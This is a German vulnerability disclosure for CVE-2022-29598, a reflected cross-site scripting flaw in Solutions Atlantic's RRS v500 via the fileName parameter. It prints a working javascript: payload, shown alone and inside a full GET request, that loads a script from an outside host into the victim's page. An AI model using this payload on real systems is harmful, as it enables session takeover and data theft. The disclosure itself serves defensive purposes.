
Die Anwendung RRS v500 ist anfällig für eine reflektierte Cross-Site-Scripting (XSS)-Sicherheitslücke.
Mitre-URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29598
NIST-URL: https://nvd.nist.gov/vuln/detail/CVE-2022-29598
Die RRS v500-Anwendung von Solutions Atlantic ist anfällig für eine reflektierte Cross-Site-Scripting (XSS)-Schwachstelle. Die Ausnutzung einer XSS-Schwachstelle könnte es einem Angreifer ermöglichen, sich als das Opfer auszugeben, vertrauliche Daten offenzulegen oder Aktionen durchzuführen, die der Opferbenutzer ausführen darf.
Es wurde festgestellt, dass der Parameter fileName Benutzereingaben akzeptiert und diese in der Serverantwort widerspiegelt. Obwohl vor der Wiedergabe einige Filterungen und Bereinigungen der Benutzereingaben durchgeführt wurden, wie z.B. die Kodierung einiger Sonderzeichen (größer/kleiner als Symbole), konnte aufgrund der Tatsache, dass die Wiedergabe in einem JavaScript-Kontext erfolgte, JavaScript-Code in die Serverantwort eingeschleust werden, wodurch die Einschränkungen umgangen wurden.
Betroffene URL:
/RRSWeb/maint/ShowDocument/ShowDocument.aspxVerwendetes XSS-Payload:
javascript:var%20x=document.createElement("script");x.src="https://thegetch.github.io/x";document.body.appendChild(x)';//Betroffene URL:
/RRSWeb/maint/ShowDocument/ShowDocument.aspxDie Anwendung kann auf externe Websites verlinken. Wenn ein Link zur externen Website ausgewählt wird, wird eine Anfrage an /RRSWeb/maint/ShowDocument/ShowDocument.aspx mit zwei Parametern gesendet: fileName, der die URL der externen Website enthält, zu der weitergeleitet werden soll, und requestType, der den Wert ExternalLink hat. Solange der Parameter requestType mit seinem Standardwert gesetzt ist, wird alles, was ein Benutzer in den Parameter fileName eingibt, in einen JavaScript-Kontext widergespiegelt, insbesondere innerhalb von window.location.href. Durch die Verwendung eines XSS-Payloads mit einer JavaScript-Direktive kann ein erfolgreicher Reflected-XSS-Angriff erfolgen.
GET-Anfrage mit XSS-Payload:
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?requestType=ExternalLink&fileName=javascript:var%20x=document.createElement("script");x.src="https://thegetch.github.io/x";document.body.appendChild(x)';// HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://<REDACTED>/RRSweb/default.aspx
Cookie: ASP.NET_SessionId=<REDACTED>
Upgrade-Insecure-Requests: 1
Content-Length: 0
Serverantwort:

Im Browser gerendert:

April 2022